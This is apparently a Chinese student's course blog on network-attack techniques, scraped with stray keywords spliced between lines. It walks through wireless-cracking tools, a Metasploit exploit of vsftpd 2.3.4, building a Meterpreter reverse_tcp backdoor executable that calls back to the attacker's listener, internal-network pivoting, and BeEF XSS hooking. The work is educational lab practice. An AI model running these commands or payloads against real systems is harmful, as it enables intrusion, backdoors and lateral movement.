一、使用Linux命令od -tcx1 Hello.java
或od -tc -tcx1 Hello.java
能够ASCII码和十六进制单字节方法输出Hello.java的内容。(-b是以八进制输出)
二、ARP欺骗不能破坏信息的完整性,破坏了信息的可用性。
三、中间人攻击能够破坏信息的机密性和完整性。(P140)
四、防火墙部署方式中,包过滤路由器和双宿主堡垒主机不能实现网络层和应用层的双重安全。
五、根据工做的网络协议层次,防火墙技术中工做网络层的是包过滤。(电路级网关在传输层;应用层代理在应用层;基于状态检测的包过滤涉及到传输层)
六、网络安全的动态安全模型的PDR中没有Policy,它在P2DP模型中。html
RFID/NFC工具
java
与之相关的是IC卡的攻击与破解,饭卡、房卡、水卡均可以成为攻击测试的目标。sql
软件定义无线电
shell
参考网站:http://geekcar.net/archives/7748
蓝牙工具集
数据库
无线网络分析工具
windows
BackTrack系列曾以此闻名,包括Aircrack-ng无线网络分析套件等工具浏览器
一、Aircrack
Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能:网络侦测、数据包嗅探、WEP和WPA/WPA-2破解。
下载地址:http://www.aircrack-ng.org/安全
二、Cowpatty,一款知名的WPA-PSK握手包密码破解工具
网络
三、EAPMD5PASS针对EAPMD5的密码破解工具
session
四、fern-wifi-cracker有图形化界面,使用Python写的
可把外置的无线网卡勾选到Kali下面
五、MDK3,是无线DOS攻击测试工具,能发起Beacon Flood、Authentication DoS等模式的攻击,还具备针对
隐藏ESSID的暴力探测模式、802.1X渗透测试、WIDS干扰等功能。
六、wifite,自动无线网审计工具,能够完成自动化破解。Python脚本编写,结合Aircrack-ng套件和Reaver工具。
七、Reaver,对开启WPS的路由器PIN码进行破解。大部分路由器的WPS都是开启的。
关于PIN码破解,参考:http://blog.csdn.net/tinyeyeser/article/details/17127805
BSSID 是指站点的 MAC 地址.
一、searchsploit能够借助关键词搜索漏洞信息以及漏洞对应的exp
searchsploit wordpress
列出了漏洞和文件地址
查看列出的文件,例:
二、ikat自动化开启不一样的exp。等待目标访问中招。
三、termineter旨在评估智能电表的安全性
Metasploit在渗透测试中常常被用到。这套软件包括了不少工具,这些工具组成了一个完整的攻击框架。
一、启动服务
在Kali中使用Metasploit,须要先开启PostgreSQL数据库服务和metasploit服务,而后就能够利用msf数据库查询exploit和记录。
二、路径介绍
Kali中msf的路径为/usr/share/metasploit-framework
三、基本命令
msfpayload:用来生成payload或者shellcode。 搜索能够用msfpayload -l |gre[ "windows"
查询; -o选项能够列出payload所需的参数。
msfencode:msf中的编码器,早期用来绕过AV(杀毒软件),现经常使用msfpayload与它编码避免exploit的坏字符串。
msfconsole:开启metasploit的console。
输入msfconsole,打开msf
四、测试示例:发现漏洞,搜索exploit
nmap -sV 222.28.136.171
能够看到21端口开放的是ftp服务,用的版本是vsftpd 2.3.4
此版本是否存在漏洞,在msf里用search vsftpd
搜索一下
发现有匹配项
五、测试示例:选择exploit,查看参数
进入exploit时发生点小问题,检查以后发现是本身输入错误,改正后正确进入
查看参数,发现RHOST的参数还未设置,接下来为其设置参数set RHOST 222.28.136.171
六、测试示例:选择payload
设置好以后,show options
查看参数,发现没有要设置的参数了
八、执行攻击
输入exploit
便可进行攻击测试,若是成功,将返回一个shell:
此时可查看id,ip地址,还有一些文件信息等,可获取目标主机的权限
生成Meterpreter后门;打开MSF,开启监听(选择exploit/multi/handler);在目标机器上执行door.exe;
msfpayload windows/meterpreter/reverse_tcp LHOST=222.28.136.234 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe /* 查看本身的IP地址为222.28.136.234,LHOST、LPORT为reverse_tcp的参数,能够在msf里查看到(记得把服务启动)*/
用use exploit/multi/handler
来接收返回的链接
设置reverse_tcp的LHOST、LPORT参数
此时执行生成后门的命令
生成了door.exe文件
在跳板获取必定权限后须要积极地向内网主机权限发展,获取指定的目标信息,探查系统漏洞,借助msf已经获得的Meterpreter后门,可使系列的操做更容易。
一、查看当前网卡、网段信息(使用ifconfig)。可查看到三个网卡,一个是本地网卡,另外一个是咱们能访问的网卡,还有一个网卡具备内网IP(访问不到,能够ping如下试试)。
二、添加路由表run autoroute -s 10.0.0.1
可使用msf中的模块跨网段攻击或扫描。可经过脚本autoroute快速添加。
三、开socket代理,经过使用auxiliary/server/socks4a模块,建立一个socks代理,能够为浏览器,sqlmap,nmap使用。经过代理便可访问内网计算机。
四、经过background和session -i能够自由切换进入session。
五、输入run能够看到在meterpreter上能够作的不少命令。
六、经过run post/能够看到后渗透测试模块
七、获取内网信息run arp_scanner -r 10.0.0.1/24
八、也能够上传文件,作端口转发后进行后续测试,例如upload lcx.exe c:\\
传送文件到c盘根目录。
一、在命令行下启动BeeFbeef-xss
二、假设被测试主机因为XSS漏洞请求到http://127.0.0.1:3000/demos/basic.html
此时页面左侧就会多出一项在线主机:
在此,输入的是hello world,以下返回成功!
五、Proxy功能(代理功能)
选中目标主机,点右键,在菜单中选中Use as Proxy;而后在Rider选项卡中的Forge Request编辑并发送想要发送的内容。
六、BeEF默认是不加载Metasploit的,若是要使用Metasploit丰富的攻击模块,须要作些配置.
默认:
配置:
首先打开beef xss目录
cd /usr/share/beef-xss/ ls nano config.yaml /* 编辑一下,能够看到有不少配置信息,包括用户名、密码均可以在这设置,在此将Metasploit的false修改成true */ clear
保证此处IP等信息设置正确(不适用127.0.0.1,需使用本机IP),并修改Custom路径:
cd extensions/metasploit/ ls nano config.yaml /* 将host和callback_host行的IP修改成本机IP,并修改custom路径为/usr/share/metasploit-framework/ */
配置好后打开msfconsole,运行命令:
load msgrpc ServerHost=222.28.136.234 Pass=abc123
执行./beef -x
从新加载Metasploit的exploit模块
加载以后,重启下服务
service beef-xss restart
此时再访问如下以前的页面,发现没法链接,稍等片刻,使用默认用户密码登陆进去。发现Metasploit下多了许多模块:
视频学习(新增/累计) | 教材学习 | 博客量(新增/累计) | |
---|---|---|---|
目标 | 34个视频 | 12章(网络攻击技术与实践) | |
第一周 | (实验楼学习) | (实验楼学习) | 1/1 |
第二周 | 5/5 | 第一、2章 | 1/2 |
第三周 | 5/10 | 第3章 | 1/3 |
第四周 | 5/15 | 第4章 | 1/4 |
第五周 | 5/20 | 第十一、12章 | 2/6 |
第六周 | 5/25 | 第五、6章 | 1/7 |
第七周 | 5/30 | 第7章 | 1/8 |